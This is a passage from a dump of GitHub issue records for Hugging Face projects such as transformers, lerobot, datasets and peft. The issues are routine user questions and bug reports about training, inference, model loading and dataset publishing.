This safetensors saving error may be a bug exclusive to my Diffusion-Transformer hybrid model architecture. \n\n### Motivation\n\nI had a problem when training a custom Diffusion-Transformer hybrid architecture with xformers and parallel model training. I tried to flatten the hybrid model for saving so the dimensions were what safetensors expected. However, safetensors seems to require the whole model to reside in one process (rather than split across parallel workers). I believe this may be a solvable error or bug? Thank you for your time. \n\n### Your contribution\n\nI am unsure how to suggest adding this feature into the safetensors project. ", "url": "https://github.com/huggingface/safetensors/issues/624", "state": "closed", "labels": [], "created_at": "2025-06-17T03:20:15Z", "updated_at": "2025-06-18T22:01:11Z", "comments": 1, "user": "viasky657" }, { "repo": "huggingface/lerobot", "number": 1330, "title": "Could you update the repository to enable the evaluation of SmolVLA's performance?", "body": "Could you update the repository to enable the evaluation of SmolVLA's performance?", "url": "https://github.com/huggingface/lerobot/issues/1330", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-06-17T02:38:22Z", "updated_at": "2025-10-17T11:50:22Z", "user": "Pandapan01" }, { "repo": "huggingface/transformers", "number": 38851, "title": "Should `compute_metrics` only run on the main process when doing DDP?", "body": "Hi, I want to know: when doing training and evaluation on a multi-GPU setup (DDP using trainer and accelerate), does `compute_metrics` only need to be run on the main process?\n\nThe reason being that `trainer` itself already does `gather_for_metrics` ([here](https://github.com/huggingface/transformers/blob/v4.51-release/src/transformers/trainer.py#L4373)), which I suppose should collect all predictions (logits) and labels across processes; running `compute_metrics` from multiple processes again would be doing duplicated work, no?\n\nTo add: I am using `batch_eval_metrics`, where I first spotted that if I run the training script (a modified version of `run_clm.py`) with `accelerate launch`, `compute_metrics` is always called multiple times, but the logits from `EvalPrediction` for each call are `per_device_eval_batch_size` * the number of GPUs I am using.", "url": "https://github.com/huggingface/transformers/issues/38851", "state": "closed", "labels": [], "created_at": "2025-06-17T00:09:43Z", "updated_at": "2025-07-25T08:02:33Z", "comments": 2, "user": "TIE666" }, { "repo": "huggingface/lerobot", "number": 1324, "title": "Where is control_robot.py script?", "body": "It is mentioned in the readme in the Walkthrough section that there is a script called control_robot.py. 
However, I cannot see it in the main branch.", "url": "https://github.com/huggingface/lerobot/issues/1324", "state": "closed", "labels": [], "created_at": "2025-06-16T15:57:34Z", "updated_at": "2025-06-18T11:06:11Z", "user": "AbdElRahmanFarhan" }, { "repo": "huggingface/agents-course", "number": 547, "title": "[QUESTION] Possible mistake in transformers size in terms of parameters", "body": "Hey,\n\nThanks for the great course!\n\nI have a question on what looks to me like an inconsistency.\nIn the [unit1/what-are-llms](https://huggingface.co/learn/agents-course/unit1/what-are-llms) section, when explaining the 3 types of transformers, under Typical Size we can see:\n\nDecoders:\nTypical Size: Billions (in the US sense, i.e., 10^9) of parameters\n\nSeq2Seq (Encoder\u2013Decoder)\nTypical Size: Millions of parameters\n\nIt looks strange to me that a Seq2Seq transformer, which comprises a Decoder within it, is smaller in Typical Size than a plain Decoder.\n\nI would put\n\nSeq2Seq (Encoder\u2013Decoder)\nTypical Size: Billions (in the US sense, i.e., 10^9) of parameters\n\nPlease tell me if there is something I misunderstood!\n\n\n", "url": "https://github.com/huggingface/agents-course/issues/547", "state": "open", "labels": [ "question" ], "created_at": "2025-06-16T14:43:29Z", "updated_at": "2025-06-16T14:43:29Z", "user": "jonoillar" }, { "repo": "huggingface/transformers.js", "number": 1341, "title": "Firefox-compatible models", "body": "### Question\n\nI am fairly new to everything here and kind of just vibe code while I learn JS, but I use Zen browser and enjoy making it more like Arc over my summer. I was wondering if it was possible to expose the native Firefox AI and be able to prompt it, which I was able to do [here](https://github.com/Anoms12/Firefox-AI-Testing.uc.mjs). I discovered the models through some [documentation](https://github.com/mozilla-firefox/firefox/blob/901f6ff7b2ead5c88bd4d5e04aa5b30f2d2f1abb/toolkit/components/ml/docs/models.rst) Copilot brought me to in Firefox, and all of the models seem to be from you. However, the prompts I am trying to feed it seem to be too advanced for the current models I am using, Xenova/LaMini-Flan-T5-248M (I also tried out base, and models below it, but anything higher than 783M seemed to require access I did not have). I was wondering if you knew of/had a good model for this prompt. If not, I would love to be pointed in the right direction with any knowledge you do have.\n\n```\nAnalyze the following numbered list of tab data (Title, URL, Description) and assign a concise category (1-2 words, Title Case) for EACH tab.\n Some tabs might logically belong to groups already present based on common domains or topics identified by keywords.\n \n Tab Categorization Strategy:\n 1. For well-known platforms (GitHub, YouTube, Reddit, etc.), use the platform name as the category.\n 2. For content sites, news sites, or blogs, PRIORITIZE THE SEMANTIC MEANING OF THE TITLE over the domain.\n 3. Look for meaningful patterns and topics across titles to create logical content groups.\n 4. Use the domain name only when it's more relevant than the title content or when the title is generic.\n \n BE CONSISTENT: Use the EXACT SAME category name for tabs belonging to the same logical group.\n\n Input Tab Data:\n {TAB_DATA_LIST}\n\n ---\n Instructions for Output:\n 1. Output ONLY the category names.\n 2. Provide EXACTLY ONE category name per line.\n 3. 
The number of lines in your output MUST EXACTLY MATCH the number of tabs in the Input Tab Data list above.\n 4. DO NOT include numbering, explanations, apologies, markdown formatting, or any surrounding text like \"Output:\" or backticks.\n 5. Just the list of categories, separated by newlines.\n ---\n\n Output:\n```\n\nIf it was not clear, it is for a tab grouping script; the community currently has an Ollama, Gemini, and Mistral version, but we want to make it as easy as possible, so this seemed like the next logical step.\n\nThank you for anything you can provide in advance. I love the project.", "url": "https://github.com/huggingface/transformers.js/issues/1341", "state": "open", "labels": [ "question" ], "created_at": "2025-06-16T12:43:39Z", "updated_at": "2025-06-16T12:47:44Z", "user": "12th-devs" }, { "repo": "huggingface/lerobot", "number": 1319, "title": "How to debug or inspect the health of Feetech servos in so101 setup?", "body": "Hi, I'm working with the `so101` robot and running into issues with the Feetech servos.\n\nI would like to ask:\n\n1. Are there any recommended tools or procedures for debugging Feetech servos?\n2. How can I check the health of a servo (e.g. temperature, load, internal error)?\n\nAny help or pointers would be greatly appreciated. Thanks!", "url": "https://github.com/huggingface/lerobot/issues/1319", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-16T08:58:32Z", "updated_at": "2025-08-12T10:01:41Z", "user": "DIMARIA123" }, { "repo": "huggingface/lerobot", "number": 1318, "title": "How to use my own dataset to train pi0 or smolVLA", "body": "I have a dataset that I collected and converted to LeRobot format. This dataset has not been uploaded to Hugging Face. I want to use this dataset to train `pi0` or `smolvla`. How should I set it up?\n\nI have tried to use only `dataset.root`, but it prompts that `dataset.repo_id` needs to be entered. What should I do?", "url": "https://github.com/huggingface/lerobot/issues/1318", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-06-16T08:40:50Z", "updated_at": "2025-10-17T11:51:54Z", "user": "xliu0105" }, { "repo": "huggingface/lerobot", "number": 1316, "title": "[Question] SmolVLA LIBERO / MetaWorld evaluation", "body": "Hello, thank you for open-sourcing this wonderful repository. I read the SmolVLA paper with great interest and tried to run some evaluations.\n\n![Image](https://github.com/user-attachments/assets/fa20ea69-c60f-467f-ba4a-30c492a7faad)\n\nIn Section 4.5 of the paper, under Simulation Evaluation, it seems that you fine-tuned the SmolVLA baseline to the Franka Emika Panda and the Sawyer arm to perform evaluation on the LIBERO and Meta-World benchmarks respectively.\nCould you elaborate on the details of the fine-tuning process? (which parameters were trained/frozen, optimizer, gradient steps, etc.)\nI am planning to reproduce the results. 
\n\nThank you.", "url": "https://github.com/huggingface/lerobot/issues/1316", "state": "closed", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-06-16T06:28:50Z", "updated_at": "2025-12-10T22:11:17Z", "user": "tykim0507" }, { "repo": "huggingface/agents-course", "number": 546, "title": "[QUESTION] Can I solve this final assignment with free versions?", "body": "First, the **best way to get a response fast is to ask the community** in our Discord server: https://www.hf.co/join/discord\n\nHowever, if you prefer, you can ask here, please **be specific**.\n\nI'd like to solve the final assignment, but I have failed with free tools. I tried to take inspiration from the leaderboard toppers, but they used paid tools, which I can't pay for. Any free roadmap or ideas?\n", "url": "https://github.com/huggingface/agents-course/issues/546", "state": "open", "labels": [ "question" ], "created_at": "2025-06-16T06:13:37Z", "updated_at": "2025-06-16T06:13:37Z", "user": "mehdinathani" }, { "repo": "huggingface/datasets", "number": 7617, "title": "Unwanted column padding in nested lists of dicts", "body": "```python\nfrom datasets import Dataset\n\ndataset = Dataset.from_dict({\n \"messages\": [\n [\n {\"a\": \"...\",},\n {\"b\": \"...\",},\n ],\n ]\n})\nprint(dataset[0])\n```\n\nWhat I get:\n```\n{'messages': [{'a': '...', 'b': None}, {'a': None, 'b': '...'}]}\n```\n\nWhat I want:\n\n```\n{'messages': [{'a': '...'}, {'b': '...'}]}\n```\n\nIs there an easy way to automatically remove these auto-filled null/none values?\n\nIf not, I probably need a recursive none exclusion function, don't I?\n\nDatasets 3.6.0", "url": "https://github.com/huggingface/datasets/issues/7617", "state": "closed", "labels": [], "created_at": "2025-06-15T22:06:17Z", "updated_at": "2025-06-16T13:43:31Z", "comments": 1, "user": "qgallouedec" }, { "repo": "huggingface/transformers.js", "number": 1340, "title": "Audio-to-Audio task", "body": "### Question\n\nHi there.\n\nI would like to know how to run **Audio-to-Audio models** with _transformers.js_.\n\nI haven't had any success finding material about this. If there is no way to do it yet, is there a schedule for adding it?\n\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/1340", "state": "open", "labels": [ "question" ], "created_at": "2025-06-15T17:58:54Z", "updated_at": "2025-10-13T04:45:39Z", "user": "LuSrodri" }, { "repo": "huggingface/open-r1", "number": 677, "title": "Error from E2B executor: cannot access local variable 'sandbox' where it is not associated with a value", "body": "Hi there,\n\nI encountered a bug while following the sandbox setup instructions exactly as provided. Here\u2019s what I\u2019m seeing:\n\n![Image](https://github.com/user-attachments/assets/b0bebd84-00cb-469d-a73e-dbf9f91555f3)\n\nHas anyone experienced this before? Any advice on how to resolve it would be greatly appreciated!\n\nThank you. : )", "url": "https://github.com/huggingface/open-r1/issues/677", "state": "closed", "labels": [], "created_at": "2025-06-14T19:08:22Z", "updated_at": "2025-07-22T06:55:38Z", "user": "juyongjiang" }, { "repo": "huggingface/agents-course", "number": 536, "title": "[QUESTION] Llama-3.3-70B-Instruct model request denied", "body": " My request for access to the Llama-3.3-70B-Instruct model was denied. However, it was accepted for the Llama 4 models. 
Is it possible that Meta is limiting access after the release of Llama 4 in April?\n\nCould the course be updated to reflect this change?", "url": "https://github.com/huggingface/agents-course/issues/536", "state": "open", "labels": [ "question" ], "created_at": "2025-06-12T00:29:48Z", "updated_at": "2025-06-12T00:29:48Z", "user": "BookDisorder" }, { "repo": "huggingface/transformers.js", "number": 1339, "title": "Model is cached, but still reloads from network?", "body": "### Question\n\nI have this code in a React project: \n```\nimport { env, pipeline } from \"@xenova/transformers\";\nconst model = await pipeline(\"translation\", \"Xenova/opus-mt-de-en\");\nlet transText = await model(\"hallo, ich bin hier\");\n```\n\nWhen I inspect the browser cache, I see relevant files in \"cache storage\" (xenova-opus-mt-de-en...).\nBut when I reload, the network tab shows I am re-downloading it each time from cdn.jsdelivr.net.\n\nHow can I get it to grab the cached version instead of doing a network request?", "url": "https://github.com/huggingface/transformers.js/issues/1339", "state": "closed", "labels": [ "question" ], "created_at": "2025-06-11T16:19:26Z", "updated_at": "2025-06-27T06:06:25Z", "user": "patrickinminneapolis" }, { "repo": "huggingface/peft", "number": 2583, "title": "Lora transfer learning", "body": "Hello, I am training a LoRA model with the Flux Fill pipeline using diffusers+peft+accelerate. I already have a general-purpose LoRA model for my application, which was trained for 5k steps on a large dataset. Now I want to do transfer learning to fine-tune on a very small dataset, but starting from the previous LoRA model instead of training from scratch. How can I do it? My LoRA config is as follows. Currently I am using the `gaussian` method to initialize the LoRA model. Is there any way to use a pretrained LoRA model without random initialization? Thanks in advance. \n\n```\n lora_config:\n r: 256\n lora_alpha: 256\n init_lora_weights: \"gaussian\"\n target_modules: \"(.*x_embedder|.*(? Float32Array(5120000) [...]\n```\n\nSince the model itself has only 16-bit precision, returning a Float32Array (instead of [Float16Array](https://caniuse.com/mdn-javascript_builtins_float16array) that is supported in latest browsers) seems a waste of performance. Is this comment correct, and do we have plans to support Float16Array for better performance? 
Thanks!", "url": "https://github.com/huggingface/transformers.js/issues/1338", "state": "open", "labels": [ "question" ], "created_at": "2025-06-11T07:29:19Z", "updated_at": "2025-07-03T05:50:56Z", "user": "xmcp" }, { "repo": "huggingface/transformers", "number": 38745, "title": "[Bug][InformerForPredict] The shape will cause a problem", "body": "### System Info\n\nWhen I set the infomerconfig.input_size = 1, I find a bug, but I don't know how to fix it.\n\n- Function Name : `create_network_inputs`\n```\ntime_feat = (\n torch.cat(\n (\n past_time_features[:, self._past_length - self.config.context_length :, ...],\n future_time_features,\n ),\n dim=1,\n )\n if future_values is not None\n else past_time_features[:, self._past_length - self.config.context_length :, ...]\n )\n\n print(self._past_length)\n # target\n if past_observed_mask is None:\n past_observed_mask = torch.ones_like(past_values)\n\n context = past_values[:, -self.config.context_length :]\n observed_context = past_observed_mask[:, -self.config.context_length :]\n _, loc, scale = self.scaler(context, observed_context)\n\n inputs = (\n (torch.cat((past_values, future_values), dim=1) - loc) / scale\n if future_values is not None\n else (past_values - loc) / scale\n )\n print(loc.shape, scale.shape, inputs.shape)\n\n # static features\n log_abs_loc = loc.abs().log1p() if self.config.input_size == 1 else loc.squeeze(1).abs().log1p()\n log_scale = scale.log() if self.config.input_size == 1 else scale.squeeze(1).log()\n print(f\"log_abs_loc: {log_abs_loc.shape}, {log_scale.shape}\")\n print(time_feat.shape, self.config.input_size)\n static_feat = torch.cat((log_abs_loc, log_scale), dim=1)\n print(time_feat.shape, static_feat.shape)\n if static_real_features is not None:\n static_feat = torch.cat((static_real_features, static_feat), dim=1)\n if static_categorical_features is not None:\n embedded_cat = self.embedder(static_categorical_features)\n static_feat = torch.cat((embedded_cat, static_feat), dim=1)\n print(time_feat.shape, static_feat.shape)\n expanded_static_feat = static_feat.unsqueeze(1).expand(-1, time_feat.shape[1], -1)\n\n # all features\n features = torch.cat((expanded_static_feat, time_feat), dim=-1)\n\n # lagged features\n subsequences_length = (\n self.config.context_length + self.config.prediction_length\n if future_values is not None\n else self.config.context_length\n )\n lagged_sequence = self.get_lagged_subsequences(sequence=inputs, subsequences_length=subsequences_length)\n lags_shape = lagged_sequence.shape\n reshaped_lagged_sequence = lagged_sequence.reshape(lags_shape[0], lags_shape[1], -1)\n\n if reshaped_lagged_sequence.shape[1] != time_feat.shape[1]:\n raise ValueError(\n f\"input length {reshaped_lagged_sequence.shape[1]} and time feature lengths {time_feat.shape[1]} does not match\"\n )\n\n # transformer inputs\n transformer_inputs = torch.cat((reshaped_lagged_sequence, features), dim=-1)\n\n return transformer_inputs, loc, scale, static_feat\n```\n\nAs we can see, I add some `print` sentence in the library to see the shape, now the bug is:\n```\nTraceback (most recent call last):\n File \"/home/wjt/luck/FinalWork/alert_models/informer_based_model_3_cpu.py\", line 820, in \n pipline.train_model()\n File \"/home/wjt/luck/FinalWork/alert_models/informer_based_model_3_cpu.py\", line 466, in train_model\n outputs = model(\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n File 
\"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/transformers/models/informer/modeling_informer.py\", line 1844, in forward\n outputs = self.model(\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/transformers/models/informer/modeling_informer.py\", line 1568, in forward\n transformer_inputs, loc, scale, static_feat = self.create_network_inputs(\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/transformers/models/informer/modeling_informer.py\", line 1386, in create_network_inputs\n expanded_static_feat = static_feat.unsqueeze(1).expand(-1, time_feat.shape[1], -1)\nRuntimeError: expand(torch.cuda.FloatTensor{[32, 1, 2, 1]}, size=[-1, 27, -1]): the number of sizes provided (3) must be greater or equal to the number of dimensions in the tensor (4)\n```\n- First\n```\nlog_abs_loc = loc.abs().log1p() if self.config.input", "url": "https://github.com/huggingface/transformers/issues/38745", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-11T07:22:06Z", "updated_at": "2025-07-20T11:41:45Z", "comments": 11, "user": "2004learner" }, { "repo": "huggingface/transformers", "number": 38740, "title": "[DOCS] Add `pruna` as optimization framework", "body": "### Feature request\n\nHave a section on Pruna AI within the documentation. We did [a similar PR for diffusers](https://github.com/huggingface/diffusers/pull/11688) and thought it would be nice to show how to optimize transformers models too. \n.\n\n### Motivation\n\nHave a section on Pruna AI within the documentation to show how to optimize LLMs for inference.\n\n### Your contribution\n\nWe could do everything for the PR.", "url": "https://github.com/huggingface/transformers/issues/38740", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-06-11T04:52:33Z", "updated_at": "2025-07-16T08:56:52Z", "comments": 8, "user": "davidberenstein1957" }, { "repo": "huggingface/sentence-transformers", "number": 3390, "title": "How to create a customized model architecture that fits sentence-transformer's training framework?", "body": "I'd like to train a two tower model that takes categorical features, floats features in one tower, and the other tower just encodes a document using an out of the box embedding. Then the outputs from both towers are feed into sentence transformers loss function. All the training configuration should reuse sentence transformer's setup (loss function implementation, Training Arguments, etc) as much as possible. \n\nIs this even feasible? Skimmed through the document found this page here (https://www.sbert.net/docs/sentence_transformer/usage/custom_models.html#structure-of-sentence-transformer-models), but the example on this page seems to be creating a new module, but only as part of a purely sequential models, each connected to its next. \n\nMuch appreciated! 
", "url": "https://github.com/huggingface/sentence-transformers/issues/3390", "state": "open", "labels": [], "created_at": "2025-06-11T03:07:42Z", "updated_at": "2025-06-12T05:05:54Z", "user": "HuangLED" }, { "repo": "huggingface/lerobot", "number": 1258, "title": "Leader Servo Numbering different from script to documentation", "body": "First thank you for sharing this amazing work!\n\nI am initializing the servos for the arm leader and I noticed that the numbering for the Wrist Roll and Wrist Pitch are different from the documentation when I ran the script:\n\n![Image](https://github.com/user-attachments/assets/b12def57-e455-4a0d-8ef0-3e356eab473e)\n\nwrist_roll is set to 5 in the script but set to 4 in the documentation\nwrist_flex is set to 4 in the script but set to 5 (assuming it is Wrist Pitch) in the documentation\n\nI guess nothing to worry about ?\n\n", "url": "https://github.com/huggingface/lerobot/issues/1258", "state": "open", "labels": [ "documentation", "question" ], "created_at": "2025-06-10T21:03:03Z", "updated_at": "2025-08-12T10:04:29Z", "user": "FaboNo" }, { "repo": "huggingface/transformers", "number": 38733, "title": "GRPO per_device_eval_batch_size can't be set as 1, when there is only 1 GPU", "body": "`eval batch size must be evenly divisible by the number of generations per prompt. ` When I only have one GPU, I cannot set `per_device_eval_batch_size=1` because there will be no reasonable G to choose from. Is it possible to automatically calculate a value similar to the number of gradient accumulation steps to achieve this feature?", "url": "https://github.com/huggingface/transformers/issues/38733", "state": "closed", "labels": [], "created_at": "2025-06-10T14:58:11Z", "updated_at": "2025-06-11T09:45:32Z", "comments": 0, "user": "CasanovaLLL" }, { "repo": "huggingface/lerobot", "number": 1254, "title": "[Feature Proposal] Planning a new user friendly simulation environment for new task and data collection", "body": "Hello and bonjour! First and foremost, I really wanted to thanks the team and community for making this wonderful repo. It really helps and guide beginner in this field. And I also wanted to contribute for the community.\n\nReading the issues here, I found a lot of people are trying to run without physical robot. But with the current Aloha and Xarm simulation environment it is hard to config and train new task. So I was thinking to make new env where we could do that.\n\nHere is the main new feature:\n- New sim env we can use as extra like Xarm, Aloha and Pusht in a new repo.\n- Make a simple, game like GUI which enable controlling the manipulator with only keyboard and mouse. (Thinking of making a mini robot on html that can be controlled with mouse, z axis and gripper with keyboard)\n- Make it compatible to recent official MuJoCo release for further [update](https://playground.mujoco.org/) and [extension](https://github.com/google-deepmind/mujoco_warp). (Planning to use [MJX](https://mujoco.readthedocs.io/en/stable/mjx.html)(RL compatible) model)\n- Realtime inference using mujoco view.\n\nI'm a beginner in this field, so it might be a hard task for me. But I thought this this project might help quite people, and also really funny to do. So I'll try my best.\n\nWhat are your thoughts on this proposal? 
(Sorry if similar features already exist.)\nIf it is okay, I'll start to dig in.\n", "url": "https://github.com/huggingface/lerobot/issues/1254", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2025-06-10T12:36:13Z", "updated_at": "2025-08-12T10:04:42Z", "user": "Bigenlight" }, { "repo": "huggingface/lerobot", "number": 1252, "title": "Failed to sync read 'Present_Position' on ids=[2,3,4,6]after 1 tries. [TxRxResult] There is no status packet", "body": "My arm is a Koch arm. When I set the motor ids and baudrates, it reports this error:\nFailed to sync read 'Present_Position' on ids=[2,3,4,6]after 1 tries. [TxRxResult] There is no status packet", "url": "https://github.com/huggingface/lerobot/issues/1252", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-10T10:21:05Z", "updated_at": "2025-09-01T02:24:25Z", "user": "huazai665" }, { "repo": "huggingface/lerobot", "number": 1251, "title": "where is async inference", "body": "Hi, thanks for SmolVLA.\nI have a question: **where is the async inference?**\nThe eval.py script doesn't seem to be meant for SmolVLA inference.\nHoping for your early reply; thanks in advance.", "url": "https://github.com/huggingface/lerobot/issues/1251", "state": "closed", "labels": [], "created_at": "2025-06-10T07:44:38Z", "updated_at": "2025-06-30T11:35:25Z", "user": "JuilieZ" }, { "repo": "huggingface/transformers.js", "number": 1336, "title": "node.js WebGPU compatibility and WASM performance in web enviornment", "body": "### Question\n\nHello!\n\nI've been running some performance benchmarks on whisper models and noticed that the web environment (running in a react renderer in electron, separate worker with WASM) produced slower transcription results than the python counterpart (e.g. 1400ms vs 400ms per batch) - both utilizing the same number of threads and data types.\n\nThe node.js environment running with WASM was almost on par with python, but unfortunately it won't let me pick webgpu as the device - only cpu and dml are supported.\n\nThe onnxruntime-node package does mention webgpu being supported, so I was wondering if it will be available for transformers running in the node.js environment.\n\nAnd I'm also wondering if the performance drop using WASM in the web environment is expected or if I'm doing something wrong.", "url": "https://github.com/huggingface/transformers.js/issues/1336", "state": "open", "labels": [ "question" ], "created_at": "2025-06-10T06:05:36Z", "updated_at": "2025-06-11T06:53:35Z", "user": "devnarekm" }, { "repo": "huggingface/transformers", "number": 38709, "title": "`get_video_features` in XCLIPModel always returns `pooled_output`", "body": "### System Info\n\nhttps://github.com/huggingface/transformers/blob/f4fc42216cd56ab6b68270bf80d811614d8d59e4/src/transformers/models/x_clip/modeling_x_clip.py#L1376\n\nHi\n\nThe `get_video_features` function is hardcoded to always return the `pooled_output`. But sometimes, it might be beneficial to get the `last_hidden_state` instead. 
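As a workaround I currently call the vision tower directly, mirroring the first half of `get_video_features` minus the pooling (an untested sketch; `model` and `inputs` are as in the reproduction below):\n\n```python\nimport torch\n\n# pixel_values comes out of the processor as (batch, frames, channels, h, w);\n# the vision tower consumes individual frames, so fold frames into the batch.\npixel_values = inputs[\"pixel_values\"]\nb, f, c, h, w = pixel_values.shape\nwith torch.no_grad():\n    vision_outputs = model.vision_model(pixel_values=pixel_values.reshape(b * f, c, h, w))\nlast_hidden = vision_outputs.last_hidden_state  # (b * f, seq_len, hidden)\n```\n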
Can we fix this behavior?\n\nThanks\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nimport av\nimport torch\nimport numpy as np\n\nfrom transformers import AutoProcessor, AutoModel\nfrom huggingface_hub import hf_hub_download\n\nnp.random.seed(0)\n\n\ndef read_video_pyav(container, indices):\n '''\n Decode the video with PyAV decoder.\n Args:\n container (`av.container.input.InputContainer`): PyAV container.\n indices (`List[int]`): List of frame indices to decode.\n Returns:\n result (np.ndarray): np array of decoded frames of shape (num_frames, height, width, 3).\n '''\n frames = []\n container.seek(0)\n start_index = indices[0]\n end_index = indices[-1]\n for i, frame in enumerate(container.decode(video=0)):\n if i > end_index:\n break\n if i >= start_index and i in indices:\n frames.append(frame)\n return np.stack([x.to_ndarray(format=\"rgb24\") for x in frames])\n\n\ndef sample_frame_indices(clip_len, frame_sample_rate, seg_len):\n '''\n Sample a given number of frame indices from the video.\n Args:\n clip_len (`int`): Total number of frames to sample.\n frame_sample_rate (`int`): Sample every n-th frame.\n seg_len (`int`): Maximum allowed index of sample's last frame.\n Returns:\n indices (`List[int]`): List of sampled frame indices\n '''\n converted_len = int(clip_len * frame_sample_rate)\n end_idx = np.random.randint(converted_len, seg_len)\n start_idx = end_idx - converted_len\n indices = np.linspace(start_idx, end_idx, num=clip_len)\n indices = np.clip(indices, start_idx, end_idx - 1).astype(np.int64)\n return indices\n\n\n# video clip consists of 300 frames (10 seconds at 30 FPS)\nfile_path = hf_hub_download(\n repo_id=\"nielsr/video-demo\", filename=\"eating_spaghetti.mp4\", repo_type=\"dataset\"\n)\ncontainer = av.open(file_path)\n\n# sample 8 frames\nindices = sample_frame_indices(clip_len=8, frame_sample_rate=1, seg_len=container.streams.video[0].frames)\nvideo = read_video_pyav(container, indices)\n\nprocessor = AutoProcessor.from_pretrained(\"microsoft/xclip-base-patch32\")\nmodel = AutoModel.from_pretrained(\"microsoft/xclip-base-patch32\")\n\ninputs = processor(\n videos=list(video),\n return_tensors=\"pt\",\n padding=True,\n)\n\n# forward pass\nwith torch.no_grad():\n outputs = model.get_video_features(**inputs)\n\nprint(outputs.shape)\n```\n\n### Expected behavior\n\nThe `get_video_features` function should have the option to output the `last_hidden_state` as well.", "url": "https://github.com/huggingface/transformers/issues/38709", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-10T00:51:37Z", "updated_at": "2025-07-18T08:02:50Z", "comments": 4, "user": "Vishu26" }, { "repo": "huggingface/lerobot", "number": 1242, "title": "SmolVLA Gym Simulation - Release?", "body": "Hello,\n\nI've trained the smolvla_base for 200K steps. I'm trying to run inference and visualize it like we do for aloha or pusht. Could anyone guide me on this? 
\n\nI don't have a robot arm, so Gym simulation is something I'm looking for; when will it be released?", "url": "https://github.com/huggingface/lerobot/issues/1242", "state": "closed", "labels": [ "question", "policies", "visualization" ], "created_at": "2025-06-09T13:05:38Z", "updated_at": "2025-10-17T11:00:57Z", "user": "Jaykumaran" }, { "repo": "huggingface/smollm", "number": 78, "title": "how to continuously pretrain VLM base model", "body": "As the title says: how can I continuously pretrain a VLM base model?", "url": "https://github.com/huggingface/smollm/issues/78", "state": "open", "labels": [ "Image", "Video" ], "created_at": "2025-06-09T07:04:57Z", "updated_at": "2025-07-29T12:50:50Z", "user": "allenliuvip" }, { "repo": "huggingface/text-generation-inference", "number": 3259, "title": "Enable passing arguments to chat templates", "body": "### Feature request\n\nI would like to enable passing parameters to a chat template when using the messages API. Something like:\n```python\nqwen3_model = HuggingFaceModel(...)\npredictor = qwen3_model.deploy(...)\npredictor.predict({\n\"messages\": [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\" },\n {\"role\": \"user\", \"content\": \"What is deep learning?\"}\n ]\n\"template_args\": { \"enable_thinking\": False }\n})\n```\n\n### Motivation\n\nThere are models with various custom arguments that can be passed to chat templates. For example, Qwen3 comes with an `enable_thinking` parameter that can be either True or False, and CohereLabs c4ai-command-r-plus RAG chat template has a `citation_mode` flag that can be `accurate` or `fast`.\n\n### Your contribution\n\nUnfortunately, no. I do not know Rust beyond some basics.", "url": "https://github.com/huggingface/text-generation-inference/issues/3259", "state": "open", "labels": [], "created_at": "2025-06-09T06:04:27Z", "updated_at": "2025-06-09T07:53:17Z", "comments": 2, "user": "alexshtf" }, { "repo": "huggingface/datasets", "number": 7600, "title": "`push_to_hub` is not concurrency safe (dataset schema corruption)", "body": "### Describe the bug\n\nConcurrent processes modifying and pushing a dataset can overwrite each others' dataset card, leaving the dataset unusable.\n\nConsider this scenario:\n- we have an Arrow dataset\n- there are `N` configs of the dataset\n- there are `N` independent processes operating on each of the individual configs (e.g. adding a column, `new_col`)\n- each process calls `push_to_hub` on their particular config when they're done processing\n- all calls to `push_to_hub` succeed\n- the `README.md` now has some configs with `new_col` added and some with `new_col` missing\n\nAny attempt to load a config (using `load_dataset`) where `new_col` is missing will fail because of a schema mismatch between `README.md` and the Arrow files. Fixing the dataset requires updating `README.md` by hand with the correct schema for the affected config. In effect, `push_to_hub` is doing a `git push --force` (I found this behavior quite surprising).\n\nWe have hit this issue every time we run processing jobs over our datasets and have to fix corrupted schemas by hand.\n\nReading through the code, it seems that specifying a [`parent_commit`](https://github.com/huggingface/huggingface_hub/blob/v0.32.4/src/huggingface_hub/hf_api.py#L4587) hash around here https://github.com/huggingface/datasets/blob/main/src/datasets/arrow_dataset.py#L5794 would get us to a normal, non-forced git push, and avoid schema corruption. 
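Concretely, the push behavior I would want from `push_to_hub` looks like this sketch built directly on `huggingface_hub` (repo id and file contents are hypothetical):\n\n```python\nfrom huggingface_hub import CommitOperationAdd, HfApi\n\napi = HfApi()\nrepo_id = \"my-org/my-dataset\"  # hypothetical\n\n# Remember which revision the in-memory copy was loaded from...\nbase_sha = api.dataset_info(repo_id).sha\n\nops = [CommitOperationAdd(path_in_repo=\"README.md\", path_or_fileobj=b\"...\")]\n\n# ...and refuse to push if someone else committed in the meantime,\n# instead of force-overwriting their changes.\napi.create_commit(\n    repo_id=repo_id,\n    repo_type=\"dataset\",\n    operations=ops,\n    commit_message=\"update one config\",\n    parent_commit=base_sha,\n)\n```\n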
